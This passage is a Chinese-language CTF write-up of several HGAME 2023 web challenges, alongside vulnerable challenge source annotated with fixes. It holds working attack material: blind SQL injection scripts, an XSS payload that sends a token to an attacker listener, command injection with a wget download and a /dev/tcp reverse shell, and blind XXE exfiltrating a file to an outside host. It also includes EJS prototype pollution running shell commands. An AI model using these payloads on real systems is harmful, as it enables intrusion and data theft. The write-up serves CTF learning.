'Cookie': '_ga=GA1.1.41308100.1673534855; dark_mode=0; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3MzY4NjE2MXxEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18p83DrKePiU6Cm-ll27huH1r-VNy8S_bQHxrgpjDZg9U=',
'Host': 'week-2.hgame.lwsec.cn:32118',
'Origin': 'http://week-2.hgame.lwsec.cn:32118',
'Referer': 'http://week-2.hgame.lwsec.cn:32118/home',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}

res = ''
for i in range(1,100):
old_res = res
for j in range(32,128):
# 数据库 se4rch
# payload = f'ascii(mid((SELECT(Database())),{i},1))^{j}'

# 表名 5ecret15here,L1st,user1nf0
# 也可以用DATABASE()代替数据库名
# payload = f'ascii(mid((SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)LIKE("se4rch")),{i},1))^{j}'

# 列名 f14gggg1shere
# payload = f'ascii(mid((SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)LIKE("5ecret15here")),{i},1))^{j}'

# flag hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}
payload = f'ascii(mid((SELECT(GROUP_CONCAT(f14gggg1shere))FROM(5ecret15here)),{i},1))^{j}'
data = {'search_id':payload}
response = requests.post(url=url, headers=headers, data=data)
# print(response.text)
# result = re.findall(r'<div id="result">(.*?)</div>', response.text, re.S)[0]
if('hard disk' in response.text):
res += chr(j^1)
break
if res == old_res:
break
print(res)

Designer

直接admin登录,share页面有提示admin will see it later

审计源码后发现register路由有flag,但是要内部访问

// Registration endpoint: signs a JWT whose payload carries the submitted
// username together with a flag string.
app.post("/user/register", (req, res) => {
  const { username } = req.body;

  // NOTE(review): `&&` binds tighter than `||`, so this condition reads as
  //   (username == "admin" && ip == "127.0.0.1") || ip == "::ffff:127.0.0.1"
  // A request arriving from the IPv4-mapped loopback address gets the real
  // flag whatever username it sends. Group the two address checks in
  // parentheses, and do not treat a loopback source address as authentication:
  // anything that can make the server issue a local request satisfies it.
  const grantsRealFlag =
    (username == "admin" && req.ip == "127.0.0.1") || req.ip == "::ffff:127.0.0.1";
  const flag = grantsRealFlag ? "hgame{true_flag_here}" : "hgame{fake_flag_here}";

  // NOTE(review): a JWT payload is signed, not encrypted. Whoever holds the
  // token can read `flag`, so secrets do not belong in it.
  const token = jwt.sign({ username, flag }, secret);
  res.json({ token });
});

下面的 /button/preview 路由存在 XSS 漏洞,黑名单禁用了一些关键字,但可以用 eval(atob(...)) 绕过

// Preview endpoint: renders the "preview" template with the query-string
// parameters, after blanking every parameter whose name or value matches one
// of the denylisted patterns.
app.get("/button/preview", (req, res) => {
  const blacklist = [
    /on/i,
    /localStorage/i,
    /alert/,
    /fetch/,
    /XMLHttpRequest/,
    /window/,
    /location/,
    /document/,
  ];

  for (const key in req.query) {
    for (const pattern of blacklist) {
      // NOTE(review): `.trim()` assumes a string value. A repeated or nested
      // query parameter would presumably arrive as an array or object and
      // throw here; confirm against the configured query parser.
      const blocked = pattern.test(key.trim()) || pattern.test(req.query[key].trim());
      if (blocked) {
        req.query[key] = "";
      }
    }
  }

  // NOTE(review): a keyword denylist is not output encoding. It only matches
  // the listed identifiers literally (most of them case-sensitively), so
  // markup that never spells those names out passes unchanged. The template
  // (not shown here) should HTML-encode every value it emits, ideally backed
  // by a Content-Security-Policy that forbids inline script.
  res.render("preview", { data: req.query });
});

利用share路由来插入payload和访问

// Share endpoint (behind `auth`): opens the preview page for the submitted
// button style in a headless Chromium, stores a token in that page's
// localStorage and clicks the rendered button.
app.post("/button/share", auth, async (req, res) => {
  // NOTE(review): `--no-sandbox` switches off Chromium's process sandbox while
  // the browser renders content derived from the request body. Run the browser
  // sandboxed (or in a locked-down container) when it visits user-influenced pages.
  const launchOptions = {
    headless: true,
    executablePath: "/usr/bin/chromium",
    args: ["--no-sandbox"],
  };
  const browser = await puppeteer.launch(launchOptions);
  const page = await browser.newPage();

  // The whole request body is forwarded as the preview query string, so the
  // caller decides every parameter the privileged browser session will render.
  const previewUrl = `http://127.0.0.1:9090/button/preview?${querystring.encode(req.body)}`;
  await page.goto(previewUrl);

  // NOTE(review): the token is written into localStorage of the origin that
  // has just rendered caller-supplied data; any script running on that page
  // can read it.
  await page.evaluate(() => localStorage.setItem("token", "jwt_token_here"));
  await page.click("#button");

  // NOTE(review): nothing in this handler closes `browser`, so each request
  // appears to leave a Chromium process behind. Confirm, and close it in a
  // `finally` once the visit is done.
  res.json({ msg: "admin will see it later" });
});

编写payload

var xhr = new XMLHttpRequest();
xhr.open("POST","http://127.0.0.1:9090/user/register",true);
xhr.setRequestHeader('content-type', 'applicationjson');
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
var xhr1 = new XMLHttpRequest();
xhr1.open("GET","http://XXX.XXX.XX.XX:XXXX/"+xhr.responseText);
xhr1.send(null);
}
}
var data = {"username":"admin"};
xhr.send(JSON.stringify(data));

本地开启监听,在share直接打

POST /button/share HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6ImhnYW1le2Zha2VfZmxhZ19oZXJlfSIsImlhdCI6MTY3Mzg4MDk1OX0.1TQg2QY5w4KiQ41LplIvQ6HCxXeSehgWosd5gFoi7Ho
Connection: keep-alive
Content-Length: 714
Content-Type: application/json
Cookie: _ga=GA1.1.41308100.1673534855; dark_mode=0; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3MzY4NjE2MXxEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18p83DrKePiU6Cm-ll27huH1r-VNy8S_bQHxrgpjDZg9U=
Host: week-2.hgame.lwsec.cn:30104
Origin: http://week-2.hgame.lwsec.cn:30104
Referer: http://week-2.hgame.lwsec.cn:30104/button/edit
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36


{"border-radius":"100px","background-color":"#000000","color":"#ffffff","border-width":"1px","box-shadow":"3px 3px #000","test":"\"><script>eval(atob('此处写入base64加密后的payload即可'))</script><\""}

然后查看监听得到token

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmbGFnIjoiaGdhbWV7Yl9jNHJlX2FiMHV0X3Byb3AzcnQxdHlfaW5qRWN0aU9ufSIsImlhdCI6MTY3Mzg4MTMyNn0.9cL849te3rbTdSDeEhR4Hy3TYk7VuL2nsJlu8aidjP4"}

用 https://jwt.io/ 解码即可(JWT 的 payload 只是 base64url 编码后加了签名,并没有加密,拿到 token 就能读出内容)

{
"flag": "hgame{b_c4re_ab0ut_prop3rt1ty_injEctiOn}",
"iat": 1673881326
}

Week3

Login To Get My Gift

登录界面存在sql注入,测试后发现禁用一些字符

= 空格 union like and

使用regexp盲注

#encoding: utf-8
import os
import requests
import re
import string
import threading
import urllib

letters = string.ascii_letters + string.digits + '-_}{,'

url = "http://week-3.hgame.lwsec.cn:31678/login"

flag = ''
for i in range(1,100):
for j in letters:
data = {
# 数据库 l0g1nme
# "username":f"a'or(select/**/database()/**/regexp(\"^{flag+j}\"))#",

# 表名 User1nf0mAt1on
# "username":f"a'or(select(select/**/group_concat(table_name)from/**/information_schema.tables)regexp(\"^{flag+j}\"))#",

# 列名 id,usern4me,passw0rd
# "username":f"a'or(select(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/\"User1nf0mAt1on\")regexp(\"^{flag+j}\"))#",

# 用户名 hgAmE2023HAppYnEwyEAr,testuser
# "username":f"a'or(select(select/**/group_concat(usern4me)from/**/User1nf0mAt1on)regexp/**/binary/**/\"^{flag+j}\")#",

# 密码 WeLc0meT0hgAmE2023hAPPySql,testpassword
"username":f"a'or(select(select/**/group_concat(passw0rd)from/**/User1nf0mAt1on)regexp/**/binary/**/\"^{flag+j}\")#",
"password": "0"
}
response = requests.post(url=url, data=data)
if 'Success' in response.text:
flag += j
print(flag)
break

注意最后结果要区分大小写,使用该账户登录

password=WeLc0meT0hgAmE2023hAPPySql&username=hgAmE2023HAppYnEwyEAr

登录后访问 /home

hgame{It_1s_1n7EresT1nG_T0_ExPL0Re_Var10us_Ways_To_Sql1njEct1on}

Ping To The Host

部署一个恶意文件

sh -i >& /dev/tcp/xxx.xxx.xx.xx/xxxxxx 0>&1

先下载恶意文件

ip=127.0.0.1|wge\t%09http://xxx.xxx.xx.xx/exp

然后反弹shell即可

ip=127.0.0.1|bas\h%09exp

在根目录下得到flag

ping.png

顺路看下源码

from flask import Flask, render_template, request
import os
import re

# Flask application object; the route decorators below register their handlers on it.
app = Flask(__name__)


@app.route("/", methods=["GET"])
def index():
    """Serve the ping form (index.html) for GET requests to the site root."""
    page = render_template("index.html")
    return page


@app.route("/post", methods=["POST"])
def post():
    """Handle the ping form.

    Reads ``ip`` from the submitted form, rejects an empty value or one that
    waf() flags, otherwise runs ``ping`` through the shell and renders
    index.html with "Success" or "Failed" depending on the exit status.
    """
    # The route only accepts POST, so this guard is not expected to trigger.
    if request.method != "POST":
        return None

    ip = request.form.get("ip")
    print(ip)  # the raw form value goes to stdout

    if not ip:
        return render_template("index.html", message="Your ip cannot be empty")

    if waf(ip):
        return render_template("index.html", message="Waf!")

    # NOTE(review): `ip` is client-controlled form data concatenated into a
    # shell command line, so any shell syntax that waf() does not list is
    # interpreted by the shell (command injection). Fix: parse the value with
    # ipaddress.ip_address() and run ping without a shell, e.g.
    # subprocess.run(["ping", "-c", "5", "-w", "15", str(addr)]).
    res = os.system("ping -c 5 -w 15 " + ip)
    print(res)

    mes = "Success" if res == 0 else "Failed"
    return render_template("index.html", message=mes)


def waf(ip):
    """Return True when ``ip`` matches any entry of the denylist, else False.

    Each entry is used as a regular expression and searched case-insensitively
    anywhere in the input; every search result is printed to stdout.

    NOTE(review): this is a denylist of substrings, not validation. It does not
    list every character the shell treats specially, and the shell rewrites its
    input (quoting, escapes) after this check has run, so a clean result does
    not make the value safe to concatenate into a command. Accept only values
    that parse as an IP address instead.
    """
    flags = re.MULTILINE | re.IGNORECASE
    patterns = (";", "cat", ">", "<", "cd", " ", "tac", "sh", "\\+", "echo", "flag")
    for pattern in patterns:
        hit = re.search(pattern, ip, flags)
        print(hit)
        if hit is not None:
            return True
    return False


if __name__ == "__main__":
    # Started directly: Flask's built-in server, listening on every interface, port 80.
    app.run(host="0.0.0.0", port=80)

Gopher Shop

整数溢出,可以使用2<<45(即 2^46 = 70368744177664,对应下面请求里的 number 参数)

GET /api/v1/user/buyProduct?product=Flag&number=70368744177664 HTTP/1.1
Host: week-3.hgame.lwsec.cn:32018
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Referer: http://week-3.hgame.lwsec.cn:32018/shop
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.41308100.1673534855; _ga_P1E9Z5LRRK=GS1.1.1673534854.1.1.1673536392.0.0.0; SESSION=MTY3NDY2NTg3MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXxekOjqNPPWh-9h9e_otzhkRGXPnOpeotEWZA1kkvwT2w==; session=MTY3NDY2OTc2N3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fGWqb-tXfvhtArGTKVpLiHKHSHtXFhQWeBmT8yg6aooa
Connection: close


购买成功后直接Check Flag即可

hgame{GopherShop_M@gic_1nt_0verflow}

Week4

Tell Me

访问www.zip获取源码,看下send.php

<?php

// Feedback endpoint: parses the POSTed XML body and answers with a fixed
// status string depending on whether name, email and content are present.

// NOTE(review): passing false turns libxml's external entity loader back on.
// (The function is deprecated as of PHP 8.0.) Leave the loader disabled.
libxml_disable_entity_loader(false);

if ($_SERVER["REQUEST_METHOD"] != "POST") {
    die("Request Method Not Allowed");
}

$xmldata = file_get_contents("php://input");
if (isset($xmldata)) {
    $dom = new DOMDocument();
    try {
        // NOTE(review): LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD
        // loads the external DTD subset. With the entity loader enabled above,
        // a document supplied by the client can make the server read local
        // files or fetch URLs (XXE). Fix: call loadXML() without these flags
        // and reject any input that carries a DOCTYPE.
        $dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);
    } catch (Exception $e) {
        echo "loading xml data error";
        return;
    }
    $data = simplexml_import_dom($dom);

    // All three elements must exist in the document.
    if (!isset($data->name, $data->email, $data->content)) {
        echo "name,email,content cannot be empty";
        return;
    }

    // Every response is a constant string: nothing parsed is echoed back, but
    // entity expansion has already happened by the time loadXML() returns.
    $allFilled = $data->name && $data->email && $data->content;
    echo $allFilled ? "Success! I will see it later" : "Parse xml data error";
    return;
}

?>

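首行 libxml_disable_entity_loader(false); 重新启用了外部实体加载,loadXML 又带了 LIBXML_NOENT | LIBXML_DTDLOAD(展开实体并加载外部 DTD),可以看出有 XXE 漏洞;响应里只输出固定字符串,没有回显。先部署下自己的 exp.dtd(记得把嵌套实体声明里的 % 编码成 &#37;)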

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=flag.php">
<!ENTITY % print "<!ENTITY &#37; send SYSTEM 'http://xxx.xxx.xx.xx:xxxxxxx/?c=%file;'>">

然后打

<!DOCTYPE xxe [
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xx.xx/exp.dtd">
%dtd;%print;%send;]>

发现flag

tellme.png

解码一下即可

<?php 
$flag1 = "hgame{Be_Aware_0f_XXeBl1nd1njecti0n}";
?>

Shared Diary

用 JSON 格式提交登录请求获取 session

{
"username":"admin",
"password":"1",
"constructor":{
"prototype":{
"constructor":{
"prototype":{
"constructor":{
"prototype":{
"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');",
"compileDebug":true,
"role":"admin"
}
}
}
}
}
}
}

然后带上得到的 session,用 POST 请求 / 即可

session=s%3AHHwyaFtboARnsQI0PO6-9LJ9nrxBLQ-S.%2FdYHGGiw8Q3FhBzWW0ZZ7Y%2FhVCq%2BuMbczIqvEePmWtY;

最后得到flag

hgame{N0tice_prototype_pollution&&EJS_server_template_injection}